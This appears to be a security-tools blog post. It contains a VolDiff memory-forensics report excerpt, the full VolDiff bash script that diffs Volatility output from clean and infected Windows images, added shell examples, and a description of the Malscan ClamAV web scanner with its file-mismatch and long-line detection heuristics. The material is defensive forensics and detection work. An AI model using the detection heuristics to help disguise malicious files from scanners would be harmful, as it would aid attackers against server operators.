2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:138 -> *:*| 4/UDPv4//0x3da0e2d0
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:1900 -> *:*| 3140/UDPv4//0x3e1db610
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:58119 -> *:*| 3140/UDPv4//0x3fc51990
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:1900 -> *:*| 3140/UDPv6//0x3dc2ec70
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:58117 -> *:*| 3140/UDPv6//0x3fdc2e98
2015-04-18 22:58:09 UTC+0000|[PROCESS]| wuauclt.exe| PID: 3976/PPID: 924/POffset: 0x3f9c9738
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:0 -> *:*| 1232/UDPv4//0x3f297f50
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:5355 -> *:*| 1232/UDPv4//0x3f9346f8
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:5355 -> *:*| 1232/UDPv4//0x3fac7110
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| :::0 -> *:*| 1232/UDPv6//0x3f297f50
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:68 -> *:*| 756/UDPv4//0x3faa0238
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| :::5355 -> *:*| 1232/UDPv6//0x3f9346f8
2015-04-18 22:58:29 UTC+0000|[PROCESS]| cmd.exe| PID: 1184/PPID: 1544/POffset: 0x3dade0c0 End: 2015-04-18 22:58:29 UTC+0000
2015-04-18 22:58:29 UTC+0000|[PROCESS]| conhost.exe| PID: 2560/PPID: 360/POffset: 0x3fd23030 End: 2015-04-18 22:58:29 UTC+0000
2015-04-18 22:58:29 UTC+0000|[PROCESS]| ipconfig.exe| PID: 2544/PPID: 1184/POffset: 0x3fd0c980 End: 2015-04-18 22:58:29 UTC+0000


Suspicious new svcscan entries
=========================================================================

Process ID: -
Service State: SERVICE_STOPPED
Binary Path: -
Process ID: 876
Service State: SERVICE_RUNNING
Binary Path: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
Process ID: 924
Service State: SERVICE_RUNNING
Binary Path: C:\Windows\system32\svchost.exe -k netsvcs


Suspicious new cmdline entries
=========================================================================

wuauclt.exe pid:   3976
Command line : "C:\Windows\system32\wuauclt.exe"
************************************************************************
cmd.exe pid:   1184
conhost.exe pid:   2560
ipconfig.exe pid:   2544


Suspicious new mutantscan entries
=========================================================================

Offset(P)              #Ptr     #Hnd Signal Thread           CID Name
------------------ -------- -------- ------ ---------- --------- ----
0x000000003da022f8        3        2      1 0x00000000           HGFSMUTEX
0x000000003da3e120        2        1      1 0x00000000           5827a689a8a470200835d840817112f0
0x000000003daaab90        2        1      1 0x00000000           WininetProxyRegistryMutex
0x000000003df68d60        2        1      0 0x855d8248 2108:1140 41df362a3f3d701bb5b5749a3e43f484
0x000000003e171b68        5        4      1 0x00000000           d3b1bbc7-c020-4056-9ded-7c6f40b5a2fc
0x000000003f984208        2        1      0 0x852c41d0 2108:3712 ad1751de900a1713cecd716adfda611f
0x000000003f99a228        2        1      1 0x00000000           WininetStartupMutex
0x000000003f9ddef8        2        1      0 0x872aabe0  2108:668 cb16681dee85a67993f0759da19566be
0x000000003fcd69a0        2        1      1 0x00000000           WininetConnectionMutex

Suspicious new getsids entries
=========================================================================

wuauclt.exe (3976): S-1-5-21-2921091077-2763243831-321783825-1000 (victim)
wuauclt.exe (3976): S-1-5-21-2921091077-2763243831-321783825-513 (Domain Users)
wuauclt.exe (3976): S-1-1-0 (Everyone)
wuauclt.exe (3976): S-1-5-32-544 (Administrators)
wuauclt.exe (3976): S-1-5-32-545 (Users)
wuauclt.exe (3976): S-1-5-4 (Interactive)
wuauclt.exe (3976): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
wuauclt.exe (3976): S-1-5-11 (Authenticated Users)
wuauclt.exe (3976): S-1-5-15 (This Organization)
wuauclt.exe (3976): S-1-5-5-0-276475 (Logon Session)
wuauclt.exe (3976): S-1-2-0 (Local (Users with the ability to log in locally))
wuauclt.exe (3976): S-1-5-64-10 (NTLM Authentication)
wuauclt.exe (3976): S-1-16-8192 (Medium Mandatory Level)
cmd.exe (1184): S-1-5-18 (Local System)
cmd.exe (1184): S-1-5-32-544 (Administrators)
cmd.exe (1184): S-1-1-0 (Everyone)
cmd.exe (1184): S-1-5-11 (Authenticated Users)
cmd.exe (1184): S-1-16-16384 (System Mandatory Level)
conhost.exe (2560): S-1-5-18 (Local System)
conhost.exe (2560): S-1-5-32-544 (Administrators)
conhost.exe (2560): S-1-1-0 (Everyone)
conhost.exe (2560): S-1-5-11 (Authenticated Users)
conhost.exe (2560): S-1-16-16384 (System Mandatory Level)
ipconfig.exe (2544): S-1-5-18 (Local System)
ipconfig.exe (2544): S-1-5-32-544 (Administrators)
ipconfig.exe (2544): S-1-1-0 (Everyone)
ipconfig.exe (2544): S-1-5-11 (Authenticated Users)
ipconfig.exe (2544): S-1-16-16384 (System Mandatory Level)

Bash Script :

#!/bin/bash
# VolDiff malware analysis script.
# Written by Houcem Hachicha aka @aim4r.

version="0.9.1"

################################ PRINT AMAZING BANNER ################################
echo -e " _    __      ______  _ ________"
echo -e "| |  / /___  / / __ \(_) __/ __/"
echo -e "| | / / __ \/ / / / / / /_/ /_  "
echo -e "| |/ / /_/ / / /_/ / / __/ __/  "
echo -e "|___/\____/_/_____/_/_/ /_/     "

echo -e "\nVolDiff: Malware Memory Footprint Analysis (v$version)"
################################ HELP SECTION ################################
if [[ $@ =~ "--help" ]] ; then
  echo -e "\nUsage: ./VolDiff.sh BASELINE_IMAGE INFECTED_IMAGE PROFILE [OPTION]"
  echo -e "\nDirections:" 
  echo -e "1. Capture a memory dump of a clean Windows system and save it as \"baseline.raw\". This image will serve as a baseline for the analysis."
  echo -e "2. Execute your malware sample on the same system, then take a second memory dump and save it as \"infected.raw\""
  echo -e "3. Run VolDiff as follows: \"./VolDiff.sh baseline.raw infected.raw <profile>\" where <profile> is Win7SP0x86 or Win7SP1x64 etc"
  echo -e "VolDiff will save the output of a selection of volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, suspicious drivers etc)."
  echo -e "\nOptions:"
  echo -e "--dependencies	display information about script dependencies and exit"
  echo -e "--help		display this help and exit"
  echo -e "--add-hints	add useful hints to the report"
  echo -e "--no-report	do not create a report"
  echo -e "--version	display script version information and exit"
  echo -e "\nTested using Volatility 2.4 (vol.py) on Windows 7 images."
  echo -e "Report bugs to houcem.hachicha[@]gmail.com"
  exit
fi

################################ VERSION INFORMATION SECTION ################################
if [[ $@ =~ "--version" ]] ; then
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  echo -e "Written by Houcem Hachicha @aim4r. Report bugs to houcem.hachicha[@]gmail.com."
  exit
fi

################################ DEPENDENCIES SECTION ################################
if [[ $@ =~ "--dependencies" ]] ; then
  echo -e "Requires volatility 2.4 (vol.py) to be installed."
  exit
fi

################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################

if [[ -f $1 ]] ; then
  baseline_memory_image=$1
  echo -e "Path to baseline memory image: $baseline_memory_image..."
elif [[ -f baseline.raw ]] ; then
  baseline_memory_image=baseline.raw
  echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
elif [[ -f baseline.vmem ]] ; then
  baseline_memory_image=baseline.vmem
  echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
else
  echo -e "Please specify a path to a baseline memory image."
  exit
fi

if [[ -f $2 ]]; then
  infected_memory_image=$2
  echo -e "Path to infected memory image: $infected_memory_image..."
elif [[ -f infected.raw ]] ; then
  infected_memory_image=infected.raw
  echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
elif [[ -f infected.vmem ]] ; then
  infected_memory_image=infected.vmem
  echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
else
  echo -e "Please specify a path to a memory image of an infected system."
  exit
fi

if [[ -z $3 ]] ; then
  #profile=Win7SP1x64
  profile=Win7SP0x86
  echo -e "Profile is not specified. Using default ($profile)..." 
elif [[ $3 != Win7SP1x64 ]] &&  [[ $3 != Win7SP0x86 ]] ; then
  profile=$3
  echo -e "WARNING: This script was only tested using Win7SP0x86 and Win7SP1x64 profiles. The specified profile ($profile) seems different!" 
else
  profile=$3
  echo -e "Profile: $profile..."
fi

################################ CREATING REPORT FOLDERS ################################
starttime=$(date +%s)
output_dir=VolDiff_$(date +%F_%R)
report=VolDiff-report.txt
mkdir $output_dir

################################ RUNNING VOLATILITY PLUGINS ################################
echo -e "Running a selection of volatility plugins..."
for plugin in timeliner strings handles psxview netscan getsids pslist psscan cmdline consoles dlllist svcscan mutantscan drivermodule driverscan devicetree modscan callbacks ldrmodules privs orphanthreads malfind  
do
  echo -e "Volatility plugin "$plugin" execution in progress..."
  mkdir $output_dir/$plugin
  if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]] ; then
    vol.py --profile=$profile -f $baseline_memory_image $plugin --silent &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin --silent &> $output_dir/$plugin/infected-$plugin.txt 
  elif [[ $plugin = "orphanthreads" ]]  ; then
    vol.py --profile=$profile -f $baseline_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/baseline-orphanthreads.txt
    vol.py --profile=$profile -f $infected_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/infected-orphanthreads.txt
  # running timeliner in background (time consuming)
  elif [[ $plugin = "timeliner" ]] ; then
    vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt &
    vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt &
  elif [[ $plugin = "strings" ]] ; then
    mkdir $output_dir/$plugin/ips-domains
    strings -a -td $baseline_memory_image > $output_dir/$plugin/baseline-$plugin.txt 
    strings -a -td $infected_memory_image > $output_dir/$plugin/infected-$plugin.txt
    diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin --string-file=$output_dir/$plugin/diff-$plugin.txt &> $output_dir/$plugin/diff-$plugin-vol.txt
    rm $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt
  elif [[ $plugin = "malfind" ]] ; then
    mkdir $output_dir/$plugin/dump-dir-baseline
    mkdir $output_dir/$plugin/dump-dir-infected
    vol.py --profile=$profile -f $baseline_memory_image $plugin -D $output_dir/$plugin/dump-dir-baseline &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin -D $output_dir/$plugin/dump-dir-infected &> $output_dir/$plugin/infected-$plugin.txt
  else
    vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt
  fi
done
wait

################################ DIFFING VOLATILITY RESULTS ################################
echo -e "Diffing output results..."
for plugin in timeliner psxview netscan getsids pslist psscan cmdline consoles dlllist handles svcscan mutantscan drivermodule driverscan modscan devicetree callbacks ldrmodules privs orphanthreads malfind
do
  diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
done

################################ STRINGS ANALYSIS ################################
echo -e "Hunting for IPs, domains and email addresses in memory strings..."
cat $output_dir/strings/diff-strings-vol.txt | perl -e 'while(<>){if(/(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/){print $_;}}' &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt
cat $output_dir/strings/diff-strings-vol.txt | perl -e 'while(<>){ if(/(http|https|ftp|mail)\:[\/\w.]+/){print $_;}}' &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt
cat $output_dir/strings/diff-strings-vol.txt | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt


################################ REPORT CREATION ################################
if [[ $@ =~ "--no-report" ]] ; then 
  endtime=$(date +%s)
  echo -e "\nAll done in $(($endtime - $starttime)) seconds. No report created." 
  exit
fi
echo -e "Creating a report..."
touch $output_dir/$report
echo -e " _    __      ______  _ ________" >> $output_dir/$report
echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
echo -e "\nVolatility analysis report generated by VolDiff v$version (https://github.com/aim4r/VolDiff/)." >> $output_dir/$report
echo -e "Report bugs to houcem.hachicha[@]gmail.com." >> $output_dir/$report
    
for plugin in netscan pslist psscan psxview ldrmodules malfind timeliner svcscan cmdline consoles drivermodule driverscan modscan callbacks orphanthreads devicetree mutantscan getsids privs
do
  echo -e "\n\nSuspicious new $plugin entries" >> $output_dir/$report
  echo -e "=========================================================================\n" >> $output_dir/$report
  if [[ -s $output_dir/$plugin/diff-$plugin.txt ]] ; then
     # special processing for psxview
    if [[ $plugin = "psxview" ]] ; then
      cat $output_dir/psxview/diff-psxview.txt | grep "[0-9] False" > $output_dir/psxview/hidden.tmp
      if [[ -s $output_dir/psxview/hidden.tmp ]] ; then
        sed -n '2p' $output_dir/psxview/infected-psxview.txt >> $output_dir/$report
        sed -n '3p' $output_dir/psxview/infected-psxview.txt >> $output_dir/$report
        cat $output_dir/psxview/hidden.tmp >> $output_dir/$report
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/psxview/hidden.tmp
    # processing pslist and psscan output
    elif [[ $plugin = "pslist"  ]] || [[ $plugin = "psscan"  ]] ; then
     sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
     sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
     cat $output_dir/$plugin/baseline-$plugin.txt | tr -s ' ' | cut -d " " -f 3 > $output_dir/$plugin/baseline-pids.temp
     cat $output_dir/$plugin/infected-$plugin.txt | tr -s ' ' | cut -d " " -f 3  > $output_dir/$plugin/infected-pids.temp
     diff $output_dir/$plugin/baseline-pids.temp $output_dir/$plugin/infected-pids.temp | grep -E "^>" | sed 's/^..//' | uniq &>> $output_dir/$plugin/unique-new-pids.temp
     while read pid; do
       # -w matches the PID as a whole word, so PID 12 does not also pull in 1234
       cat $output_dir/$plugin/infected-$plugin.txt | grep -w "$pid" >> $output_dir/$report
     done < $output_dir/$plugin/unique-new-pids.temp
     rm $output_dir/$plugin/baseline-pids.temp $output_dir/$plugin/infected-pids.temp $output_dir/$plugin/unique-new-pids.temp  
    # processing ldrmodules output
    elif [[ $plugin = "ldrmodules"  ]] ; then
      cat $output_dir/$plugin/diff-$plugin.txt | grep "False" >> $output_dir/$plugin/$plugin.tmp
      if [[ -s $output_dir/$plugin/ldrmodules.tmp ]] ; then
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/$plugin.tmp >> $output_dir/$report  
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/$plugin/$plugin.tmp
    # filtering timeliner results
    elif [[ $plugin = "timeliner" ]] ; then 
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PROCESS" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "NETWORK CONNECT" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PE HEADER (module)" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PE HEADER (exe)" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/$plugin.tmp | sort >> $output_dir/$report
     rm $output_dir/$plugin/$plugin.tmp
    # processing plugins that don't need output formatting
    elif [[ $plugin = "devicetree" ]] || [[ $plugin = "orphanthreads" ]] || [[ $plugin = "cmdline" ]] || [[ $plugin = "consoles" ]] || [[ $plugin = "svcscan" ]] || [[ $plugin = "malfind" ]] || [[ $plugin = "getsids" ]] ; then
      cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
    # processing other plugins
    else
      sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
      sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
      cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
    fi
    # additional processing for malfind dumped processes 
    if [[ $plugin = "malfind" ]] ; then      
      echo -e "\n\nSuspicious ips/domains/emails found in dumped processes (malfind)" >> $output_dir/$report
      echo -e "=========================================================================\n" >> $output_dir/$report
      strings -a -td $output_dir/malfind/dump-dir-infected/* > $output_dir/malfind/dump-dir-infected/malfind-strings.temp 
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -oE '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      if [[ -s $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp ]] ; then
        cat $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp >> $output_dir/$report  
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp $output_dir/malfind/dump-dir-infected/malfind-strings.temp
    fi
    # adding comments (help for further analysis)
    if [[ $@ =~ "--add-hints" ]] ; then 
      if [[ $plugin = "drivermodule" ]] ; then 
        echo -e "\nHint: Drivers without a module (UNKNOWN) should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "driverscan" ]] ; then 
        echo -e "\nHint: Drivers that have no associated service should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "netscan" ]] ; then 
        echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the domains in memory strings." >> $output_dir/$report
      fi
      if [[ $plugin = "privs" ]] ; then 
        echo -e "\nHint: privs was run with the -s switch. It will only show the privileges that were not enabled by default." >> $output_dir/$report
      fi
      if [[ $plugin = "malfind" ]] ; then
        echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VT. IPs and domains from the entire memory image were dumped to disk under $output_dir/strings/ips-domains (too verbose to be included here). Use grep -A 10 and -B 10 to investigate strings located next to suspicious ones. Note that strings/diff-strings-vol.txt includes strings and associated PIDs, and thus should be grepped for suspicious PIDs, or strings." >> $output_dir/$report
      fi
      if [[ $plugin = "getsids" ]] ; then 
        echo -e "\nHint: Check the output of handles for suspicious processes, and grep for mutants, then Google those. Also grep the output of ldrmodules for any hidden dlls associated with suspicious processes. Note that the procexedump and dlldump volatility plugins can be used to respectively dump processes and DLLs from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "mutantscan" ]] ; then 
        echo -e "\nHint: Google mutants associated with suspicious processes." >> $output_dir/$report
      fi
      if [[ $plugin = "ldrmodules" ]] ; then 
        echo -e "\nHint: DLLs that are not located under System32 can be suspicious." >> $output_dir/$report
      fi
    fi
  else
    echo "None" >> $output_dir/$report
  fi
done
echo -e "\nEnd of report." >> $output_dir/$report

endtime=$(date +%s)
echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."
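The core of VolDiff is the comparison step above: each plugin's baseline output is diffed against the infected one and only the ">" lines are kept. As an added example (not part of VolDiff or its author's code), here is that step as portable POSIX shell functions run over constructed pslist/psxview-style rows: comm on sorted input, so that a row that merely changed position is not reported as new; PID extraction keyed on the exact column rather than a bare grep of the PID; and the psxview "pslist = False" filter for processes hidden from the active process list. The sample rows, offsets and the sample.exe name are made up; the PIDs simply reuse those from the getsids listing above.

```shell
#!/bin/sh
# Added example, not VolDiff's own code: the baseline-vs-infected comparison
# VolDiff does with "diff | grep '^>' | sed", rewritten as portable functions
# and run over constructed pslist/psxview-style rows (all sample data below is
# made up; PIDs 1184/2544/2560 only mirror the getsids output shown earlier).

# Lines present in INFECTED ($2) but absent from BASELINE ($1), independent of
# row order. comm(1) wants sorted input, so both sides are sorted into temp
# files first; unlike diff, a row that merely moved is not reported as new.
new_entries() {
    b=$(mktemp); i=$(mktemp)
    sort "$1" >"$b"
    sort "$2" >"$i"
    comm -13 "$b" "$i"
    rm -f "$b" "$i"
}

# PIDs (third column of pslist/psscan output) present only in INFECTED.
# Header and separator rows have no numeric third column and are dropped.
new_pids() {
    b=$(mktemp); i=$(mktemp)
    awk '$3 ~ /^[0-9]+$/ { print $3 }' "$1" | sort -u >"$b"
    awk '$3 ~ /^[0-9]+$/ { print $3 }' "$2" | sort -u >"$i"
    comm -13 "$b" "$i"
    rm -f "$b" "$i"
}

# Full INFECTED rows for each new PID, matched on the exact PID column so
# that PID 12 does not also pull in 1234 or rows whose PPID happens to be 12.
rows_for_new_pids() {
    infected=$2
    new_pids "$1" "$2" | while IFS= read -r pid; do
        awk -v p="$pid" '$3 == p' "$infected"
    done
}

# psxview rows whose pslist column (4th field) is False: the process is seen
# by other enumeration methods but is missing from the active process list.
hidden_processes() {
    awk '$3 ~ /^[0-9]+$/ && $4 == "False"' "$1"
}

# --- constructed sample data, written to a temp dir whose path is printed ---
make_sample() {
    d=$(mktemp -d)
    cat >"$d/baseline-pslist.txt" <<'EOF'
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------
0x84a0b000 System                    4      0     80      500 ------      0 2015-05-01 10:00:00 UTC+0000
0x85c1d000 smss.exe                264      4      2       29 ------      0 2015-05-01 10:00:01 UTC+0000
0x86e2f000 explorer.exe           1212   1180     27      700      1      0 2015-05-01 10:00:20 UTC+0000
EOF
    # Same rows with smss.exe and explorer.exe swapped (diff would flag the
    # moved row as ">", i.e. new; comm does not), plus three new processes.
    cat >"$d/infected-pslist.txt" <<'EOF'
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------
0x84a0b000 System                    4      0     80      500 ------      0 2015-05-01 10:00:00 UTC+0000
0x86e2f000 explorer.exe           1212   1180     27      700      1      0 2015-05-01 10:00:20 UTC+0000
0x85c1d000 smss.exe                264      4      2       29 ------      0 2015-05-01 10:00:01 UTC+0000
0x87f30000 cmd.exe                1184   1212      1       20      1      0 2015-05-01 10:05:00 UTC+0000
0x8804a000 ipconfig.exe           2544   1184      1       15      1      0 2015-05-01 10:05:02 UTC+0000
0x8815b000 conhost.exe            2560    356      2       40      1      0 2015-05-01 10:05:02 UTC+0000
EOF
    cat >"$d/infected-psxview.txt" <<'EOF'
Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- --------
0x3e1b2000 explorer.exe           1212 True   True   True     True   True  True    True
0x3e4d5000 sample.exe             3020 False  True   True     True   True  True    True
EOF
    echo "$d"
}

# Demo run: prints the findings for the constructed images, then cleans up.
d=$(make_sample)
echo "New pslist rows:";  new_entries "$d/baseline-pslist.txt" "$d/infected-pslist.txt"
echo "New PIDs:";         rows_for_new_pids "$d/baseline-pslist.txt" "$d/infected-pslist.txt"
echo "Hidden processes:"; hidden_processes "$d/infected-psxview.txt"
rm -rf "$d"
```

In the constructed data the comm-based comparison reports exactly the three new processes, whereas a diff of the same two files would additionally list smss.exe because its row moved; on real images that difference matters for plugins such as handles or mutantscan, whose row order is not stable between dumps.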

Source : https://github.com/aim4r

Malscan is a powerful malware scanner and leveraging.


Malscan : Robust ClamAV-based malware scanner for web servers.

Version 1.4.3 Released: May 5, 2015 :
+ Bugfix: Corrected a logging path issue. All log files will now be correctly generated in the ‘log’ directory inside your chosen path in conf.malscan
+ Bugfix: Corrected the URL for the custom virus definitions
+ Feature: Included freshclam updates within the cron_update.sh script

Features :
– Multiple channels of malware signatures
— RFX Networks Signatures
— Metasploit Signatures
— JoshGrancell.com Signatures
— ClamAV Main Signatures
– Multiple Detection Methods
— Standard HEX or MD5 based detections
— String length detections
— MimeType mismatch detections
– Easy File Quarantining
– Built-in new file signature generation
– Customizable email notifications
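The two non-signature detection methods in the feature list, string-length and MIME-type mismatch, come down to simple file heuristics. As an added example (not Malscan's own code), here they are as portable shell functions run over constructed sample files: the extension is compared with the file's leading magic bytes, any file that starts with a PHP open tag is flagged whatever its extension, and awk replaces the GNU-only wc -L for the longest-line check. The magic-byte table, the 500-character threshold and the whitelist handling are this example's assumptions, not values taken from conf.malscan.

```shell
#!/bin/sh
# Added example, not Malscan's code: the two non-signature heuristics Malscan
# lists (extension/content mismatch and over-long lines) as portable shell
# functions, run against constructed sample files. The magic-byte table, the
# "<?ph" check and the 500-character threshold are this example's choices.

# First four bytes of a file as lowercase hex, e.g. "ffd8ffe0" for JPEG.
magic4() {
    od -An -tx1 -N4 "$1" | tr -d ' \n'
}

# Magic-byte prefix an extension is expected to carry; prints nothing for
# extensions without a fixed signature (txt), which are then only checked
# for a PHP open tag.
expected_magic() {
    case "$1" in
        jpg|jpeg) echo "ffd8ff" ;;
        png)      echo "89504e47" ;;
        gif)      echo "474946" ;;    # "GIF"
        pdf)      echo "25504446" ;;  # "%PDF"
    esac
}

# Returns 0 when FILE is suspicious: it starts with a PHP open tag ("<?ph",
# 3c 3f 70 68) or its extension promises magic bytes the content lacks.
mime_mismatch() {
    ext=$(basename "$1" | awk -F. 'NF > 1 { print tolower($NF) }')
    head4=$(magic4 "$1")
    case "$head4" in 3c3f7068*) return 0 ;; esac
    want=$(expected_magic "$ext")
    [ -z "$want" ] && return 1
    case "$head4" in "$want"*) return 1 ;; *) return 0 ;; esac
}

# Length of the longest line; awk stands in for GNU-only "wc -L".
longest_line() {
    awk '{ if (length($0) > m) m = length($0) } END { print m + 0 }' "$1"
}

# Walk TARGET and print one DETECTION line per finding. WHITELIST is a
# comma-separated list of basenames to skip, as Malscan keeps in conf.malscan.
scan_dir() {
    target=$1; threshold=$2; whitelist=${3:-}
    find "$target" -type f | while IFS= read -r f; do
        base=$(basename "$f")
        case ",$whitelist," in *",$base,"*) continue ;; esac
        if mime_mismatch "$f"; then
            echo "DETECTION: extension/content mismatch: $f"
        fi
        len=$(longest_line "$f")
        if [ "$len" -gt "$threshold" ]; then
            echo "DETECTION: line of $len chars exceeds $threshold: $f"
        fi
    done
}

# --- constructed sample files in a temp dir whose path is printed -----------
make_samples() {
    d=$(mktemp -d)
    printf '\211PNG\r\n\032\n' >"$d/logo.png"          # genuine PNG header
    printf '\377\330\377\340JFIF' >"$d/real.jpg"        # genuine JPEG header
    printf 'GIF89a' >"$d/banner.gif"                    # genuine GIF header
    printf '<?php echo 1; ?>\n' >"$d/photo.jpg"         # PHP behind a .jpg name
    printf 'plain text\n' >"$d/notes.txt"
    awk 'BEGIN { for (i = 0; i < 600; i++) printf "A"; print "" }' >"$d/packed.txt"
    printf '<?php // vendor file\n' >"$d/license.txt"   # to be whitelisted
    echo "$d"
}

# Demo run: expect two findings (photo.jpg and packed.txt), then clean up.
d=$(make_samples)
scan_dir "$d" 500 license.txt
rm -rf "$d"
```

Checking magic bytes rather than the output of file(1) keeps the heuristic independent of the local magic database, which is what makes the result reproducible across the CentOS and Debian hosts the installation steps cover; a file that fails the check is still only a candidate for review, not a confirmed detection.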

Installation :
Step 1: Install ClamAV on your server
For Redhat/CentOS:
— Install the EPEL Repository using yum install epel-release
— Install clamav using yum install clamav
For Debian/Ubuntu, install directly from the repositories using apt-get install clamav
Step 2: Navigate to your clamav directory.
— For RedHat/CentOS: cd /usr/local/share/clamav
— For Debian/Ubuntu: cd /var/lib/clamav
Step 3: Clone this git repository with git clone https://github.com/jgrancell/Malscan.git
Step 4: Run the cron_update.sh script to update the signatures and build any needed directories/binaries with ./cron_update.sh
Step 5: Set the cron_update.sh to run at least daily through crontab -e setting the cronjob to run daily
– Daily: 0 2 * * * /path/to/clamav/cron_update.sh
– Twice Daily: 0 2,14 * * * /path/to/clamav/cron_update.sh
*NOTE: If running daily, ensure that the update is run BEFORE any scheduled scans.*
Step 6: Run the scanner as needed
— Manually: malscan -[options] /path/to/target/directory/or/file
